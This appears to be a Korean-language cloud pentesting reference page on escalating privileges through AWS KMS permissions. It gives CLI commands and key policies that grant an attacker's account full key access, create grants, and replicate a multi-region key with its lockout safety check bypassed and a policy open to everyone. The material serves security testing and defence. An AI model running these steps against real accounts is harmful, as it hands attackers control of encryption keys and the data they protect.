AWS - KMS Privesc

Reading time: 4 minutes

KMS

KMS에 대한 자세한 정보는 다음을 확인하세요:

AWS - KMS Enum

kms:ListKeys,kms:PutKeyPolicy, (kms:ListKeyPolicies, kms:GetKeyPolicy)

이 권한을 사용하면 키에 대한 접근 권한을 수정하여 다른 계정이나 심지어 누구나 사용할 수 있도록 할 수 있습니다:

aws kms list-keys
aws kms list-key-policies --key-id <id> # Although only 1 max per key
aws kms get-key-policy --key-id <id> --policy-name <policy_name>
# AWS KMS keys can only have 1 policy, so you need to use the same name to overwrite the policy (the name is usually "default")
aws kms put-key-policy --key-id <id> --policy-name <policy_name> --policy file:///tmp/policy.json

policy.json:

{
"Version": "2012-10-17",
"Id": "key-consolepolicy-3",
"Statement": [
{
"Sid": "Enable IAM User Permissions",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::<origin_account>:root"
},
"Action": "kms:*",
"Resource": "*"
},
{
"Sid": "Allow all use",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::<attackers_account>:root"
},
"Action": ["kms:*"],
"Resource": "*"
}
]
}

kms:CreateGrant

이것은 주체가 KMS 키를 사용할 수 있도록 허용합니다:

aws kms create-grant \
--key-id 1234abcd-12ab-34cd-56ef-1234567890ab \
--grantee-principal arn:aws:iam::123456789012:user/exampleUser \
--operations Decrypt

# Use the grant token in a request
aws kms generate-data-key \
--key-id 1234abcd-12ab-34cd-56ef-1234567890ab \
–-key-spec AES_256 \
--grant-tokens $token

키의 권한을 나열하는 것이 가능합니다:

aws kms list-grants --key-id <value>

kms:CreateKey, kms:ReplicateKey

이 권한을 사용하면 다른 정책을 가진 다른 지역에서 다중 지역이 활성화된 KMS 키를 복제할 수 있습니다.

따라서 공격자는 이를 악용하여 키에 대한 권한 상승을 얻고 이를 사용할 수 있습니다.

aws kms replicate-key --key-id mrk-c10357313a644d69b4b28b88523ef20c --replica-region eu-west-3 --bypass-policy-lockout-safety-check --policy file:///tmp/policy.yml

{
"Version": "2012-10-17",
"Id": "key-consolepolicy-3",
"Statement": [
{
"Sid": "Enable IAM User Permissions",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": "kms:*",
"Resource": "*"
}
]
}

kms:Decrypt

이 권한은 키를 사용하여 정보를 복호화할 수 있게 해줍니다.
자세한 내용은 다음을 확인하세요:

AWS - KMS Post Exploitation